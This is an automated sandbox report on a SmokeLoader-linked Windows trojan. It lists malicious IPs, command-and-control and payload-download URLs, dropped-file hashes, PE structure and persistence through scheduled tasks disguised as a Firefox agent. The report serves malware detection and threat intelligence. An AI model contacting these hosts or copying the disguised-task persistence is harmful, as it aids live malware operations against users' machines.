                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://api.msn.com/v1/news/Feed/Windows?&explorer.exe, 00000001.00000000.1795949633.00000000096DF000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                  https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svgexplorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                  https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                  https://android.notify.windows.com/iOSexplorer.exe, 00000001.00000000.1799460114.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/arexplorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                    unknown
                                    https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000001.00000000.1790387901.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                    https://api.msn.com/explorer.exe, 00000001.00000000.1795949633.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-dexplorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                      unknown
                                      https://outlook.com_explorer.exe, 00000001.00000000.1799460114.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                        unknown
                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://www.msn.com:443/en-us/feedexplorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                        https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                        https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                          unknown
                                          https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-ofexplorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                            unknown
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
                                            IPDomainCountryFlagASNASN NameMalicious
                                            190.224.203.37
                                            nwgrus.ruArgentina
                                            7303TelecomArgentinaSAARtrue
                                            23.145.40.164
                                            unknownReserved
                                            22631SURFAIRWIRELESS-IN-01UStrue
                                            190.220.21.28
                                            unknownArgentina
                                            19037AMXArgentinaSAARtrue
                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1532278
                                            Start date and time:2024-10-12 23:26:10 +02:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 9m 18s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:11
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:1
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:LgigaSKsL6.exe
                                            renamed because original name is a hash value
                                            Original Sample Name:c61f76c54ce0f89894ef870a48c5497c.exe
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@7/4@23/3
                                            EGA Information:
                                            • Successful, ratio: 66.7%
                                            HCA Information:
                                            • Successful, ratio: 95%
                                            • Number of executed functions: 80
                                            • Number of non-executed functions: 18
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Execution Graph export aborted for target ajvrjra, PID 3588 because there are no executed function
                                            • Execution Graph export aborted for target vsvrjra, PID 5340 because there are no executed function
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                            • Report size getting too big, too many NtOpenKey calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                            TimeTypeDescription
                                            17:27:32API Interceptor375670x Sleep call for process: explorer.exe modified
                                            22:27:32Task SchedulerRun new task: Firefox Default Browser Agent 2B22F504E9081C81 path: C:\Users\user\AppData\Roaming\vsvrjra
                                            22:28:36Task SchedulerRun new task: Firefox Default Browser Agent BA8964795F88946F path: C:\Users\user\AppData\Roaming\ajvrjra
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            190.224.203.37uSIvID4Y7U.exeGet hashmaliciousSmokeLoaderBrowse
                                            • nwgrus.ru/tmp/index.php
                                            Wd7eNVLo7b.exeGet hashmaliciousSmokeLoaderBrowse
                                            • nwgrus.ru/tmp/index.php
                                            9VgIkx4su0.exeGet hashmaliciousSmokeLoaderBrowse
                                            • nwgrus.ru/tmp/index.php
                                            3441TYcdND.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                            • 100xmargin.com/tmp/index.php
                                            file.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
                                            • gebeus.ru/tmp/index.php
                                            XQpBmNRd7j.exeGet hashmaliciousDjvuBrowse
                                            • cajgtus.com/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200
                                            file.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, Mars StealerBrowse
                                            • sajdfue.com/files/1/build3.exe
                                            IzXkxsTrEt.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                            • sajdfue.com/files/1/build3.exe
                                            dmDeFvntUL.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoaderBrowse
                                            • sajdfue.com/files/1/build3.exe
                                            CgoegMEw8J.exeGet hashmaliciousLummaC, Babuk, Djvu, Glupteba, LummaC Stealer, PureLog Stealer, SmokeLoaderBrowse
                                            • sdfjhuz.com/dl/build2.exe
                                            23.145.40.164file.exeGet hashmaliciousSmokeLoaderBrowse
                                              mGFoU1INUk.exeGet hashmaliciousSmokeLoaderBrowse
                                                uSIvID4Y7U.exeGet hashmaliciousSmokeLoaderBrowse
                                                  wBgwzVbZuV.exeGet hashmaliciousSmokeLoaderBrowse
                                                    bQ7r31F9Ow.exeGet hashmaliciousSmokeLoaderBrowse
                                                      LbzlI5idGJ.exeGet hashmaliciousSmokeLoaderBrowse
                                                        PGUs9p74si.exeGet hashmaliciousSmokeLoaderBrowse
                                                          IpYWCeJMsb.exeGet hashmaliciousSmokeLoaderBrowse
                                                            Wd7eNVLo7b.exeGet hashmaliciousSmokeLoaderBrowse
                                                              T1TmLXusl0.exeGet hashmaliciousSmokeLoaderBrowse
                                                                190.220.21.286NlY2E3Wqi.exeGet hashmaliciousSmokeLoaderBrowse
                                                                • 100xmargin.com/tmp/index.php
                                                                66d5df681876c_file010924.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                • cajgtus.com/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200
                                                                CbLDghhFAW.exeGet hashmaliciousSmokeLoaderBrowse
                                                                • yosoborno.com/tmp/
                                                                8xFzJWrEIa.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, VidarBrowse
                                                                • sajdfue.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
                                                                file.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, SmokeLoader, VidarBrowse
                                                                • sajdfue.com/files/1/build3.exe
                                                                file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                • nidoe.org/tmp/index.php
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                nwgrus.rufile.exeGet hashmaliciousSmokeLoaderBrowse
                                                                • 190.147.128.172
                                                                mGFoU1INUk.exeGet hashmaliciousSmokeLoaderBrowse
                                                                • 119.204.11.2
                                                                uSIvID4Y7U.exeGet hashmaliciousSmokeLoaderBrowse
                                                                • 190.224.203.37
                                                                wBgwzVbZuV.exeGet hashmaliciousSmokeLoaderBrowse
                                                                • 116.58.10.60
                                                                bQ7r31F9Ow.exeGet hashmaliciousSmokeLoaderBrowse
                                                                • 190.147.2.86
                                                                LbzlI5idGJ.exeGet hashmaliciousSmokeLoaderBrowse
                                                                • 187.211.161.52
                                                                PGUs9p74si.exeGet hashmaliciousSmokeLoaderBrowse
                                                                • 92.36.226.66
                                                                IpYWCeJMsb.exeGet hashmaliciousSmokeLoaderBrowse
                                                                • 201.103.8.135
                                                                Wd7eNVLo7b.exeGet hashmaliciousSmokeLoaderBrowse
                                                                • 190.224.203.37
                                                                T1TmLXusl0.exeGet hashmaliciousSmokeLoaderBrowse
                                                                • 210.182.29.70
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                AMXArgentinaSAARSecuriteInfo.com.Linux.Siggen.9999.28522.3483.elfGet hashmaliciousMiraiBrowse
                                                                • 200.81.85.181
                                                                6NlY2E3Wqi.exeGet hashmaliciousSmokeLoaderBrowse
                                                                • 190.220.21.28
                                                                66d5df681876c_file010924.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                • 190.220.21.28
                                                                Vertexgroup#Signature.pdfGet hashmaliciousUnknownBrowse
                                                                • 23.76.39.75
                                                                CbLDghhFAW.exeGet hashmaliciousSmokeLoaderBrowse
                                                                • 190.220.21.28
                                                                ExeFile (260).exeGet hashmaliciousEmotetBrowse
                                                                • 190.220.19.82
                                                                7HddY6rYkf.elfGet hashmaliciousMiraiBrowse
                                                                • 200.80.200.184
                                                                arm.elfGet hashmaliciousMiraiBrowse
                                                                • 190.3.44.186
                                                                https://bushelman-my.sharepoint.com/:b:/p/lance/ESXtc6Laa05KpaC4W3rpMEMBfLSUU1GZhgfhBL8opRqFHg?e=Wrw3leGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                • 23.76.37.146
                                                                [EXTERNAL] New file received.emlGet hashmaliciousHTMLPhisherBrowse
                                                                • 23.76.37.146
                                                                TelecomArgentinaSAARm0mg1WH7Su.elfGet hashmaliciousMiraiBrowse
                                                                • 190.228.252.163
                                                                na.elfGet hashmaliciousUnknownBrowse
                                                                • 181.86.228.170
                                                                uSIvID4Y7U.exeGet hashmaliciousSmokeLoaderBrowse
                                                                • 190.224.203.37
                                                                na.elfGet hashmaliciousMiraiBrowse
                                                                • 190.191.148.132
                                                                cqdEWgq9fW.elfGet hashmaliciousMiraiBrowse
                                                                • 181.99.116.187
                                                                0aEXGHNxhO.elfGet hashmaliciousMirai, OkiruBrowse
                                                                • 181.103.30.179
                                                                AGjaVihni8.elfGet hashmaliciousMirai, GafgytBrowse
                                                                • 190.191.54.207
                                                                RFNnJGB7wy.elfGet hashmaliciousMiraiBrowse
                                                                • 190.17.217.229
                                                                na.elfGet hashmaliciousUnknownBrowse
                                                                • 181.108.115.242
                                                                Wd7eNVLo7b.exeGet hashmaliciousSmokeLoaderBrowse
                                                                • 190.224.203.37
                                                                SURFAIRWIRELESS-IN-01USfile.exeGet hashmaliciousSmokeLoaderBrowse
                                                                • 23.145.40.164
                                                                mGFoU1INUk.exeGet hashmaliciousSmokeLoaderBrowse
                                                                • 23.145.40.164
                                                                uSIvID4Y7U.exeGet hashmaliciousSmokeLoaderBrowse
                                                                • 23.145.40.164
                                                                wBgwzVbZuV.exeGet hashmaliciousSmokeLoaderBrowse
                                                                • 23.145.40.164
                                                                bQ7r31F9Ow.exeGet hashmaliciousSmokeLoaderBrowse
                                                                • 23.145.40.164
                                                                LbzlI5idGJ.exeGet hashmaliciousSmokeLoaderBrowse
                                                                • 23.145.40.164
                                                                PGUs9p74si.exeGet hashmaliciousSmokeLoaderBrowse
                                                                • 23.145.40.164
                                                                IpYWCeJMsb.exeGet hashmaliciousSmokeLoaderBrowse
                                                                • 23.145.40.164
                                                                Wd7eNVLo7b.exeGet hashmaliciousSmokeLoaderBrowse
                                                                • 23.145.40.164
                                                                T1TmLXusl0.exeGet hashmaliciousSmokeLoaderBrowse
                                                                • 23.145.40.164
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                72a589da586844d7f0818ce684948eeafile.exeGet hashmaliciousSmokeLoaderBrowse
                                                                • 23.145.40.164
                                                                mGFoU1INUk.exeGet hashmaliciousSmokeLoaderBrowse
                                                                • 23.145.40.164
                                                                uSIvID4Y7U.exeGet hashmaliciousSmokeLoaderBrowse
                                                                • 23.145.40.164
                                                                wBgwzVbZuV.exeGet hashmaliciousSmokeLoaderBrowse
                                                                • 23.145.40.164
                                                                bQ7r31F9Ow.exeGet hashmaliciousSmokeLoaderBrowse
                                                                • 23.145.40.164
                                                                LbzlI5idGJ.exeGet hashmaliciousSmokeLoaderBrowse
                                                                • 23.145.40.164
                                                                PGUs9p74si.exeGet hashmaliciousSmokeLoaderBrowse
                                                                • 23.145.40.164
                                                                IpYWCeJMsb.exeGet hashmaliciousSmokeLoaderBrowse
                                                                • 23.145.40.164
                                                                Wd7eNVLo7b.exeGet hashmaliciousSmokeLoaderBrowse
                                                                • 23.145.40.164
                                                                T1TmLXusl0.exeGet hashmaliciousSmokeLoaderBrowse
                                                                • 23.145.40.164
                                                                No context
                                                                Process:C:\Windows\explorer.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):243712
                                                                Entropy (8bit):5.901474520699552
                                                                Encrypted:false
                                                                SSDEEP:3072:MENmhF3Dt6agWVvGwd/5ogN7vHsq535Q+CoN8yBhFBxqXYUGrG:MEohFzyojagNzm+FKUnqI
                                                                MD5:E3C51CB2EE848A9BED855AB3E756CD82
                                                                SHA1:82387B44686504E395CAF5F097696F9CBFBCE359
                                                                SHA-256:F0419B39C8834855934A744F9787D54D47815490E5DAE270D83AF062713C9AE5
                                                                SHA-512:03680A26145C4B6A1C08788D3ED098BB9F22EB45CA89A0FD7C595B90BE877937BDD569F90BB7A0490852E53DA33FC4F9C93C0E94CCD1B7B54430E817623D5170
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                Reputation:low
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........y..*..*..*...*..*...*..*...*...*.F.*..*..*...*...*..*...*..*...*..*Rich..*........................PE..L....ijd.................R....r..............p....@...........................s.....F&......................................t...<.... r..............................................................................p..|............................text....P.......R.................. ..`.rdata..& ...p..."...V..............@..@.data...|.o..........x..............@....moboge..D....q..8..................@....woyucad.(....q..(..................@....rsrc........ r.....................@..@................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\explorer.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:modified
                                                                Size (bytes):243712
                                                                Entropy (8bit):5.901474520699552
                                                                Encrypted:false
                                                                SSDEEP:3072:MENmhF3Dt6agWVvGwd/5ogN7vHsq535Q+CoN8yBhFBxqXYUGrG:MEohFzyojagNzm+FKUnqI
                                                                MD5:E3C51CB2EE848A9BED855AB3E756CD82
                                                                SHA1:82387B44686504E395CAF5F097696F9CBFBCE359
                                                                SHA-256:F0419B39C8834855934A744F9787D54D47815490E5DAE270D83AF062713C9AE5
                                                                SHA-512:03680A26145C4B6A1C08788D3ED098BB9F22EB45CA89A0FD7C595B90BE877937BDD569F90BB7A0490852E53DA33FC4F9C93C0E94CCD1B7B54430E817623D5170
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                Reputation:low
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........y..*..*..*...*..*...*..*...*...*.F.*..*..*...*...*..*...*..*...*..*Rich..*........................PE..L....ijd.................R....r..............p....@...........................s.....F&......................................t...<.... r..............................................................................p..|............................text....P.......R.................. ..`.rdata..& ...p..."...V..............@..@.data...|.o..........x..............@....moboge..D....q..8..................@....woyucad.(....q..(..................@....rsrc........ r.....................@..@................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\explorer.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):243712
                                                                Entropy (8bit):5.889388111846404
                                                                Encrypted:false
                                                                SSDEEP:3072:2mIRlVcRxMiSBufsq53/Q+CoNnHgCFBxqXYUGrG:27yzQus+FJHhqI
                                                                MD5:C61F76C54CE0F89894EF870A48C5497C
                                                                SHA1:2A7DD87F781DF6FDAA1B17695D93EE9ACCF36D1C
                                                                SHA-256:DC6C2F9D57AEE159B5C6453B56C93FA6976F83A3685B388AFF968E5DFE498841
                                                                SHA-512:9F2290C6F27AE165E4BF78515149C76A6BD6550299F6CA765C70F89F08365BCFF313CE8FB5E4E634B45E80FE6DB8FCB9C121518623A26A535C0728F52B937021
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 42%
                                                                Reputation:low
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........y..*..*..*...*..*...*..*...*...*.F.*..*..*...*...*..*...*..*...*..*Rich..*........................PE..L...Q_We.................R....r..............p....@...........................s.............................................t...<.... r..............................................................................p..|............................text.../P.......R.................. ..`.rdata..& ...p..."...V..............@..@.data...|.o..........x..............@....beve....D....q..8..................@....cac.....(....q..(..................@....rsrc........ r.....................@..@................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\explorer.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):26
                                                                Entropy (8bit):3.95006375643621
                                                                Encrypted:false
                                                                SSDEEP:3:ggPYV:rPYV
                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                Malicious:true
                                                                Reputation:high, very likely benign file
                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Entropy (8bit):5.889388111846404
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:LgigaSKsL6.exe
                                                                File size:243'712 bytes
                                                                MD5:c61f76c54ce0f89894ef870a48c5497c
                                                                SHA1:2a7dd87f781df6fdaa1b17695d93ee9accf36d1c
                                                                SHA256:dc6c2f9d57aee159b5c6453b56c93fa6976f83a3685b388aff968e5dfe498841
                                                                SHA512:9f2290c6f27ae165e4bf78515149c76a6bd6550299f6ca765c70f89f08365bcff313ce8fb5e4e634b45e80fe6db8fcb9c121518623a26a535c0728f52b937021
                                                                SSDEEP:3072:2mIRlVcRxMiSBufsq53/Q+CoNnHgCFBxqXYUGrG:27yzQus+FJHhqI
                                                                TLSH:A63429316EF17C14F6B3CA31CE3996E4EB2FB8D29D24225D21E45A0F09F11A1E56B712
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........y...*...*...*...*...*...*...*...*...*.F.*...*...*...*...*...*...*...*...*...*Rich...*........................PE..L...Q_We...
                                                                Icon Hash:738733b183a38be4
                                                                Entrypoint:0x4018e4
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x65575F51 [Fri Nov 17 12:40:49 2023 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:5
                                                                OS Version Minor:0
                                                                File Version Major:5
                                                                File Version Minor:0
                                                                Subsystem Version Major:5
                                                                Subsystem Version Minor:0
                                                                Import Hash:636068238a0ab0df9c8e341eee8428d0
                                                                Instruction
                                                                call 00007F8EE0DA3600h
                                                                jmp 00007F8EE0D9FEFDh
                                                                mov edi, edi
                                                                push ebp
                                                                mov ebp, esp
                                                                sub esp, 00000328h
                                                                mov dword ptr [0041B3D0h], eax
                                                                mov dword ptr [0041B3CCh], ecx
                                                                mov dword ptr [0041B3C8h], edx
                                                                mov dword ptr [0041B3C4h], ebx
                                                                mov dword ptr [0041B3C0h], esi
                                                                mov dword ptr [0041B3BCh], edi
                                                                mov word ptr [0041B3E8h], ss
                                                                mov word ptr [0041B3DCh], cs
                                                                mov word ptr [0041B3B8h], ds
                                                                mov word ptr [0041B3B4h], es
                                                                mov word ptr [0041B3B0h], fs
                                                                mov word ptr [0041B3ACh], gs
                                                                pushfd
                                                                pop dword ptr [0041B3E0h]
                                                                mov eax, dword ptr [ebp+00h]
                                                                mov dword ptr [0041B3D4h], eax
                                                                mov eax, dword ptr [ebp+04h]
                                                                mov dword ptr [0041B3D8h], eax
                                                                lea eax, dword ptr [ebp+08h]
                                                                mov dword ptr [0041B3E4h], eax
                                                                mov eax, dword ptr [ebp-00000320h]
                                                                mov dword ptr [0041B320h], 00010001h
                                                                mov eax, dword ptr [0041B3D8h]
                                                                mov dword ptr [0041B2D4h], eax
                                                                mov dword ptr [0041B2C8h], C0000409h
                                                                mov dword ptr [0041B2CCh], 00000001h
                                                                mov eax, dword ptr [0041A008h]
                                                                mov dword ptr [ebp-00000328h], eax
                                                                mov eax, dword ptr [0041A00Ch]
                                                                mov dword ptr [ebp-00000324h], eax
                                                                call dword ptr [000000DCh]
                                                                Programming Language:
                                                                • [C++] VS2008 build 21022
                                                                • [ASM] VS2008 build 21022
                                                                • [ C ] VS2008 build 21022
                                                                • [IMP] VS2005 build 50727
                                                                • [RES] VS2008 build 21022
                                                                • [LNK] VS2008 build 21022
                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x187740x3c.rdata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x27220000x1cac0.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x170000x17c.rdata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x10000x1502f0x1520001f6569b89b7aebc11e2a92ac03cba2fFalse0.8203471708579881data7.53432336875115IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rdata0x170000x20260x22008f6c9359eca3fc884976521ff3812793False0.36282169117647056data5.421499959099582IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .data0x1a0000x26fff7c0x1400d3069f75e034ee377a978b9116b86ed9unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .beve0x271a0000x44000x3800b211778b80f6d441b6cf61ada776fc6dFalse0.0025809151785714285data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .cac0x271f0000x28000x28001276481102f218c981e0324180bafd9fFalse0.00322265625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .rsrc0x27220000x1cac00x1cc00d0509ad570f51aa65eb57916d4990badFalse0.44198369565217394data5.086472202691957IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                RT_ICON0x27229d00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.5700959488272921
                                                                RT_ICON0x27238780x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.6371841155234657
                                                                RT_ICON0x27241200x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.6935483870967742
                                                                RT_ICON0x27247e80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.7456647398843931
                                                                RT_ICON0x2724d500x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkishTurkey0.5137966804979253
                                                                RT_ICON0x27272f80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkishTurkey0.6128048780487805
                                                                RT_ICON0x27283a00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkishTurkey0.6180327868852459
                                                                RT_ICON0x2728d280x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkishTurkey0.7570921985815603
                                                                RT_ICON0x27292080xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.337953091684435
                                                                RT_ICON0x272a0b00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.5248194945848376
                                                                RT_ICON0x272a9580x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.5956221198156681
                                                                RT_ICON0x272b0200x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6372832369942196
                                                                RT_ICON0x272b5880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TurkishTurkey0.4259336099585062
                                                                RT_ICON0x272db300x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.5073770491803279
                                                                RT_ICON0x272e4b80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.5070921985815603
                                                                RT_ICON0x272e9880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.39498933901918976
                                                                RT_ICON0x272f8300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.5546028880866426
                                                                RT_ICON0x27300d80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.6169354838709677
                                                                RT_ICON0x27307a00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6423410404624278
                                                                RT_ICON0x2730d080x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.42706378986866794
                                                                RT_ICON0x2731db00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.4245901639344262
                                                                RT_ICON0x27327380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.4645390070921986
                                                                RT_ICON0x2732c080xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.28331556503198296
                                                                RT_ICON0x2733ab00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.36913357400722024
